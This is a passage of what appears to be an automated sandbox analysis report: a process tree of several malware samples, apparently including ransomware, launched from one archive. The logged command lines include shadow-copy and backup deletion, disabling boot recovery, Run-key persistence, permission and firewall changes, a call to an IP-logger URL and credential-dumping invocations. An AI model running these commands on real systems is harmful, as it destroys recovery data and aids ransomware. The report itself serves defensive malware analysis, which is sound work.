        C:\Users\Admin\AppData\Local\TEMPEX~1Srv.exe
        
        C:\Users\Admin\AppData\Local\TEMPEX~1Srv.exe
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:2088
        
        C:\Users\Admin\AppData\Local\TEMPEX~1SrvSrv.exe
        
        C:\Users\Admin\AppData\Local\TEMPEX~1SrvSrv.exe
        8⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:2352
        
        C:\Program Files\Internet Explorer\iexplore.exe
        
        "C:\Program Files\Internet Explorer\iexplore.exe"
        9⤵
        
        PID:2176
        
        C:\Program Files (x86)\Microsoft\DesktopLayer.exe
        
        "C:\Program Files (x86)\Microsoft\DesktopLayer.exe"
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        
        PID:2472
        
        C:\Program Files (x86)\Microsoft\DesktopLayerSrv.exe
        
        "C:\Program Files (x86)\Microsoft\DesktopLayerSrv.exe"
        9⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:1128
        
        C:\Program Files\Internet Explorer\iexplore.exe
        
        "C:\Program Files\Internet Explorer\iexplore.exe"
        10⤵
        
        PID:2624
        
        C:\Program Files\Internet Explorer\iexplore.exe
        
        "C:\Program Files\Internet Explorer\iexplore.exe"
        9⤵
        
        PID:2828
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\F180.tmp\splitterrypted.vbs
        7⤵
        Executes dropped EXE
        Drops file in Windows directory
        
        PID:1424
        
        C:\Windows\SysWOW64\wscript.exe
        
        C:\Windows\System32\wscript.exe C:\Users\Admin\AppData\Local\Temp\F180.tmp\splitterrypted.vbs
        8⤵
        Drops file in Program Files directory
        
        PID:2728
    - - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\TEMPSP~1.EXE"
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Program Files directory
        Drops file in Windows directory
        
        PID:2572
      - C:\Users\Admin\AppData\Local\TEMPSP~1.EXE
        
        C:\Users\Admin\AppData\Local\TEMPSP~1.EXE
        6⤵
        Executes dropped EXE
        
        PID:2268
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\F1AF.tmp\spwak.vbs
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Windows directory
        
        PID:1420
        
        C:\Windows\SysWOW64\wscript.exe
        
        C:\Windows\System32\wscript.exe C:\Users\Admin\AppData\Local\Temp\F1AF.tmp\spwak.vbs
        8⤵
        
        PID:1828
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]
    "[email protected]"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Enumerates connected drives
    - Drops file in System32 directory
    - Sets desktop wallpaper using registry
    - Drops file in Windows directory
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of UnmapMainImage
    PID:2452
  - - C:\Windows\SysWOW64\netsh.exe
      C:\Windows\system32\netsh.exe advfirewall set allprofiles state on
      4⤵
      Modifies Windows Firewall
      PID:2008
  - - C:\Windows\SysWOW64\netsh.exe
      C:\Windows\system32\netsh.exe advfirewall reset
      4⤵
      Modifies Windows Firewall
      PID:2940
  - - C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\_R_E_A_D___T_H_I_S___XYF6TRF_.hta"
      4⤵
      Blocklisted process makes network request
      Modifies Internet Explorer settings
      PID:1588
  - - C:\Windows\SysWOW64\NOTEPAD.EXE
      "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\_R_E_A_D___T_H_I_S___1PCWBADW_.txt
      4⤵
      Opens file in notepad (likely ransom note)
      PID:1460
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Windows\system32\cmd.exe" /d /c taskkill /f /im "E" > NUL & ping -n 1 127.0.0.1 > NUL & del "C" > NUL && exit
      4⤵
      Executes dropped EXE
      Drops file in Windows directory
      PID:2232
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /d /c taskkill /f /im E > NUL & ping -n 1 127.0.0.1 > NUL & del C > NUL && exit
        5⤵
        
        PID:1740
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im E
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:880
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 1 127.0.0.1
        6⤵
        Runs ping.exe
        
        PID:2740
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]
    "[email protected]"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of UnmapMainImage
    PID:2676
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]
    "[email protected]"
    3⤵
    - Drops startup file
    - Executes dropped EXE
    - Loads dropped DLL
    - Sets desktop wallpaper using registry
    PID:2428
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +h .
      4⤵
      Views/modifies file attributes
      PID:1780
  - - C:\Windows\SysWOW64\icacls.exe
      icacls . /grant Everyone:F /T /C /Q
      4⤵
      Modifies file permissions
      PID:1568
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      Executes dropped EXE
      PID:2032
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c 180871712738544.bat
      4⤵
      PID:2640
    - - C:\Windows\SysWOW64\cscript.exe
        
        cscript.exe //nologo m.vbs
        5⤵
        Loads dropped DLL
        
        PID:2604
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +h +s F:\$RECYCLE
      4⤵
      Views/modifies file attributes
      PID:2232
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected] co
      4⤵
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:1088
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c start /b @[email protected] vs
      4⤵
      Loads dropped DLL
      PID:2180
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
        
        @[email protected] vs
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:2848
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
        6⤵
        
        PID:2748
        
        C:\Windows\SysWOW64\vssadmin.exe
        
        vssadmin delete shadows /all /quiet
        7⤵
        Interacts with shadow copies
        
        PID:1852
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic shadowcopy delete
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:872
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      Executes dropped EXE
      PID:520
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:2732
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      Executes dropped EXE
      Sets desktop wallpaper using registry
      Suspicious use of SetWindowsHookEx
      PID:292
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "zuhdaaixrury513" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\RarSFX0\tasksche.exe\"" /f
      4⤵
      PID:1572
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "zuhdaaixrury513" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\RarSFX0\tasksche.exe\"" /f
        5⤵
        Adds Run key to start application
        Modifies registry key
        
        PID:1620
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      Executes dropped EXE
      PID:3988
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:4068
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:4040
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:3960
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:4036
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:3936
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:2460
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:2180
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:3308
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:1320
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:1792
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:2008
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:2124
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:3992
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:1840
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:2312
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:3964
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:2824
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:2504
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:2840
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:3316
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:3736
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:2232
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:2080
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:3996
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:1772
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:4688
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:5108
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:4844
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:2352
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:2664
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:3688
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:2216
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:3216
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:4104
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:2884
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:2844
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:3372
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:3456
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:4580
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:1948
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:2824
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:1692
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:3508
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:3208
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:5324
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:6044
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:4508
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:4396
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:3688
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:3760
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:5232
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:2232
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:5448
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:5800
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:5924
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:4388
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:1920
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:2784
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:3428
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:4600
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:4712
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:5596
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:5188
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:3964
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:3004
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:5696
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:4864
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:2384
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:4180
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:1068
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:1156
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:3768
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:5672
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:1928
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:5856
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:3860
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:3464
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:1864
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:5916
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:5168
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:3448
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:2248
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:1552
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:3208
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:1020
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:5508
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:228
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:4356
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:3452
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:5804
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:5636
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:4852
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:4356
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:5076
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:5696
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:2328
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:4432
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:4584
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:4020
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:3580
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:5556
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:5852
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:4384
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\RIP_YOUR_PC_LOL.exe
    "RIP_YOUR_PC_LOL.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:2944
  - - C:\Users\Admin\Desktop\1.exe
      "C:\Users\Admin\Desktop\1.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:2788
    - - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\7955.tmp\7965.tmp\7976.bat C:\Users\Admin\Desktop\1.exe"
        5⤵
        
        PID:1572
      - C:\Program Files\Internet Explorer\iexplore.exe
        
        "C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.org/2bB2s6
        6⤵
        Modifies Internet Explorer settings
        Suspicious use of FindShellTrayWindow
        Suspicious use of SetWindowsHookEx
        
        PID:2060
        
        C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2060 CREDAT:275457 /prefetch:2
        7⤵
        Modifies Internet Explorer settings
        Suspicious use of SetWindowsHookEx
        
        PID:3048
        
        C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2060 CREDAT:1324038 /prefetch:2
        7⤵
        Modifies Internet Explorer settings
        Suspicious use of SetWindowsHookEx
        
        PID:2620
        
        C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2060 CREDAT:1192968 /prefetch:2
        7⤵
        Modifies Internet Explorer settings
        Suspicious use of SetWindowsHookEx
        
        PID:2564
  - - C:\Users\Admin\Desktop\10.exe
      "C:\Users\Admin\Desktop\10.exe"
      4⤵
      Executes dropped EXE
      PID:616
    - - C:\Windows\SysWOW64\attrib.exe
        
        attrib +h .
        5⤵
        Views/modifies file attributes
        
        PID:1020
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls . /grant Everyone:F /T /C /Q
        5⤵
        Modifies file permissions
        
        PID:1840
  - - C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
      "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\Desktop\2.doc"
      4⤵
      Drops file in Windows directory
      Modifies Internet Explorer settings
      Suspicious behavior: AddClipboardFormatListener
      Suspicious use of SetWindowsHookEx
      PID:1272
    - - C:\Windows\splwow64.exe
        
        C:\Windows\splwow64.exe 12288
        5⤵
        
        PID:2328
    - - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\Microsoft\Templates\W0rd.dll,UminslaIIF0mt
        5⤵
        Executes dropped EXE
        Drops file in Windows directory
        
        PID:2948
      - C:\Windows\SysWOW64\rundll32.exe
        
        C:\Windows\System32\rundll32.exe C:\Users\Admin\AppData\Roaming\Microsoft\Templates\W0rd.dll,UminslaIIF0mt
        6⤵
        
        PID:2484
  - - C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
      "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde
      4⤵
      Enumerates system info in registry
      Modifies Internet Explorer settings
      Modifies registry class
      Suspicious use of SetWindowsHookEx
      PID:2768
  - - C:\Users\Admin\Desktop\5.exe
      "C:\Users\Admin\Desktop\5.exe"
      4⤵
      PID:1676
    - - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\PROGRA~3\system.exe"
        5⤵
        
        PID:2444
      - C:\PROGRA~3\system.exe
        
        C:\PROGRA~3\system.exe
        6⤵
        
        PID:3804
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\ProgramData\system.exe" "system.exe" ENABLE
        7⤵
        Modifies Windows Firewall
        
        PID:1720
  - - C:\Users\Admin\Desktop\6.exe
      "C:\Users\Admin\Desktop\6.exe"
      4⤵
      PID:2784
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\GeSSMWHrER.bat"
        5⤵
        
        PID:2768
      - C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        6⤵
        
        PID:3260
      - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ghhjhjhsg\ghjkl.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ghhjhjhsg\ghjkl.exe"
        6⤵
        
        PID:3368
  - - C:\Users\Admin\Desktop\7.exe
      "C:\Users\Admin\Desktop\7.exe"
      4⤵
      PID:1760
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holdermail.txt"
        5⤵
        
        PID:3324
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holderwb.txt"
        5⤵
        
        PID:748
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 748 -s 36
        6⤵
        Program crash
        
        PID:1128
  - - C:\Users\Admin\Desktop\8.exe
      "C:\Users\Admin\Desktop\8.exe"
      4⤵
      PID:2012
    - - C:\Windows\system32\wbem\wmic.exe
        
        "C:\qrj\esr\..\..\Windows\llrp\b\owmdd\..\..\..\system32\lmhu\..\wbem\wej\..\wmic.exe" shadowcopy delete
        5⤵
        
        PID:3684
  - - C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
      "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\Desktop\9.docm"
      4⤵
      PID:2980
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\ska2pwej.aeh.exe
    "ska2pwej.aeh.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:2524
  - - C:\Users\Admin\AppData\Local\Temp\is-UKQCJ.tmp\ska2pwej.aeh.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-UKQCJ.tmp\ska2pwej.aeh.tmp" /SL5="$401C2,4511977,830464,C:\Users\Admin\AppData\Local\Temp\RarSFX0\ska2pwej.aeh.exe"
      4⤵
      Executes dropped EXE
      PID:860
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\x2s443bc.cs1.exe
    "x2s443bc.cs1.exe"
    3⤵
